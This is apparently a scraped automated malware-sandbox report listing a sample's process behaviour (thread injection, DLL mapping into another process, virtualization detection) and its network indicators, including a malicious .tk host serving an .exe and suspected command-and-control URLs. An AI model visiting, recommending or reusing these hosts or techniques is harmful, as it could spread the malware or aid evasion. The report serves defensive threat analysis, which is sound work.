www.lazyguysmarketing.com 24->45 47 lazyguysmarketing.com 34.98.99.30, 49166, 80 GOOGLEUS United States 24->47 73 System process connects to network (likely due to code injection or exploit) 24->73 28 wininit.exe 24->28         started        signatures14 process15 signatures16 75 Modifies the context of a thread in another process (thread injection) 28->75 77 Maps a DLL or memory area into another process 28->77 79 Tries to detect virtualization through RDTSC time measurements 28->79 31 cmd.exe 28->31         started        process17
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.239.243.112
 fantecheo.tk Moldova Republic of
55933 CLOUDIE-AS-APCloudieLimitedHK true
34.98.99.30
 lazyguysmarketing.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
td-balancer-euw2-6-109.wixdns.net 35.246.6.109 true
lazyguysmarketing.com 34.98.99.30 true
fantecheo.tk 185.239.243.112 true
www.urbantennis.info unknown unknown
www.visionandcourage.com unknown unknown
www.lazyguysmarketing.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
www.handelsbetriebposavec.com/if60/ true
  • Avira URL Cloud: safe
 low
http://www.lazyguysmarketing.com/if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz false
  • Avira URL Cloud: safe
 unknown
http://fantecheo.tk/ibefrankzx.exe true
  • Avira URL Cloud: malware
 unknown